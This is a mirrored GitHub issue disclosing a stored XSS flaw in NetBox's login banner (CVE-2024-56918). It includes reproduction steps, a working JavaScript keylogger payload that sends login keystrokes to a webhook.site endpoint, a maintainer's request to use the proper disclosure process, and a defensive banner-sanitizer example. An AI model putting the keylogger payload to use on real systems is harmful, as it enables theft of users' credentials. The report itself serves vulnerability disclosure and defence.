XXS in Login Banner allows malicious authenticated administrators to log keystrokes. - CVE-2024-56918 #10743

Closed
opened 2025-12-29 21:35:25 +01:00 by adam · 1 comment
Owner

Originally created by @noxlumens on GitHub (Feb 7, 2025).

Deployment Type

Self-hosted

NetBox Version

v4.2.3

Python Version

3.12

Steps to Reproduce

Login Banner - https://<ADDRESS>/login/?next=/

Image: https://github.com/user-attachments/assets/e865d10e-f507-47f5-b72f-e05feafa34f0

Image: https://github.com/user-attachments/assets/45c16262-ede1-49a9-914f-d9a17765b4b7

This has been validated on Netbox version 4.2.3
Proof Of Concept (video): https://youtu.be/zBbjNNK79pg

This CVE ID has been reserved for this vulnerability: CVE-2024-56918

Summary

The login page is vulnerable to cross-site scripting (XSS), which allows a privileged, authenticated attacker to exfiltrate user input from the login form. In most use cases, the impact is minimal; however, if multiple users have access to the NetBox instance, usernames and passwords can be remotely sent to an attacker-controlled server.

Source Code:

/netbox/templates/inc/login.html

This section uses the Django |safe parameter in netbox/templates/login.html which enforces the location as trusted and allows the interpretation of user defined input without sanitizing the content.

{# Login banner #}
{% if config.BANNER_LOGIN %}
<div class="mb-5 text-center">
  {{ config.BANNER_LOGIN|safe }}
</div>
{% endif %}
Reproduce the Attack
  1. Copy the [Proof Of Concept - Capture Login Authentication] code.
     If you would like a simpler XSS example you can paste the following into the login banner config entry and skip to step 4:
     <script>alert("XSS")</script>
  2. Navigate to https://webhook.site and copy the "Your unique URL" value.
  3. Paste the "Your unique URL" value into the fetch request in [Proof Of Concept - Capture Login Authentication].
  4. Navigate to https://<ADDRESS>/core/config-revisions/add/ and paste the script into the Login banner field (https://<ADDRESS>/core/config-revisions/add/ > Login banner).
  5. Save by clicking "Create".
  6. Log out and navigate to the Login page: https://<ADDRESS>/login/?next=/
     From this point you can type your credentials. The key presses will appear as POST requests at your webhook.site address.

Proof Of Concept - Capture Login Authentication

I used https://webhook.site as the attacker server to capture key press events. This assumes the internet is accessible for upgrades and webhook.site or other similar web application is not blocked.

Login Banner
<script>
document.addEventListener('keydown', function(event) {
    var key = event.key;  // Get the key pressed
    var keyCode = event.keyCode;  // Get the keyCode (for identifying keys)

    // Function to get cookie value by name
    function getCookie(name) {
        let match = document.cookie.match(new RegExp('(^| )' + name + '=([^;]+)'));
        if (match) return match[2];
        return null;
    }
    // Send the captured key press to the attacker's server
    fetch('https://webhook.site/df459d0e-39af-4880-abbb-240a452de07e', {  // Attacker's server URL
        method: 'POST',
        mode: 'no-cors',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded',
        },
        body: `key=${encodeURIComponent(key)}&keyCode=${keyCode}`
    })
    .then(response => response.json())  // Convert to JSON
    .then(data => console.log('Key logged:', data))  // Log success
    .catch(error => console.error('Error logging key:', error));  // Log error
});
</script>

Expected Behavior

User input should be sanitized. Removing the |safe from /netbox/templates/inc/login.html will resolve this but may break intended functionality.

Observed Behavior

JavaScript alert appears on login and user keystrokes are sent to a malicious-administrator-controlled endpoint.

adam closed this issue 2025-12-29 21:35:26 +01:00
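The report's Expected Behavior section asks for the banner to be sanitized rather than rendered with `|safe`, while noting that dropping `|safe` outright may break intended formatting. The following is an added illustration, not part of this issue and not NetBox's own code, of the middle road a maintainer would typically take: an allowlist sanitizer (stdlib only, no bleach or nh3 dependency) that keeps harmless markup such as bold text and links, drops `<script>` and `<style>` content entirely, strips event-handler attributes and `javascript:` URLs, and re-escapes text. The tag and attribute allowlists and the sample banners are assumptions for the example; the `<script>alert("XSS")</script>` payload is the one from the report.

```python
"""Allowlist HTML sanitizer for an operator-supplied login banner (stdlib only).

Added example; not NetBox code. Tags/attributes below are an assumed allowlist.
"""
from html import escape
from html.parser import HTMLParser

# Markup an operator legitimately needs for a banner (assumed allowlist).
ALLOWED_TAGS = {"p", "br", "b", "strong", "i", "em", "u", "a", "ul", "ol",
                "li", "span", "div", "h1", "h2", "h3", "h4", "code"}
# Attributes permitted per tag; anything else (on*, style, ...) is dropped.
ALLOWED_ATTRS = {"a": {"href", "title"}, "span": {"class"},
                 "div": {"class"}, "p": {"class"}}
# Elements whose whole content is discarded, not just the tag itself.
DROP_CONTENT = {"script", "style", "iframe", "object", "embed"}
VOID_TAGS = {"br"}
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:", "/")


class BannerSanitizer(HTMLParser):
    """Rebuilds the document from allowed pieces only; unknown tags vanish."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a DROP_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return  # disallowed tag: drop the tag, keep its text content
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # onclick=, onerror=, style=, ... never survive
            if name == "href":
                target = (value or "").strip().lower()
                if not target.startswith(SAFE_URL_PREFIXES):
                    continue  # rejects javascript: and data: URLs
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <br/> handled like <br>

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            if self.skip_depth:
                self.skip_depth -= 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            # Text is re-escaped, so the banner can never break out of markup.
            self.out.append(escape(data, quote=False))

    def handle_comment(self, data):
        pass  # HTML comments are dropped


def sanitize_banner(raw_html):
    """Return a version of raw_html containing only allowlisted markup."""
    parser = BannerSanitizer()
    parser.feed(raw_html)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed sample banners for demonstration.
    samples = [
        '<script>alert("XSS")</script>',                       # report payload
        '<b>Welcome</b> to <a href="https://example.com/aup">NetBox</a>',
        '<a href="javascript:alert(1)" onclick="x()">policy</a>',
        '<img src=x onerror=alert(1)>Maintenance tonight & tomorrow',
    ]
    for s in samples:
        print(repr(s), "->", repr(sanitize_banner(s)))
```

The template would then render the sanitized string (for example via a template filter that applies `sanitize_banner` before marking the result safe) instead of `config.BANNER_LOGIN|safe`. Note that allowlisting by reconstruction, as above, fails closed: any tag or attribute the allowlist does not name is simply absent from the output, so a new browser feature cannot slip through unnoticed.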
Author
Owner

@DanSheps commented on GitHub (Feb 7, 2025):

Please follow the proper disclosure procedure here:

https://github.com/netbox-community/netbox/blob/main/SECURITY.md

Reference: starred/netbox#10743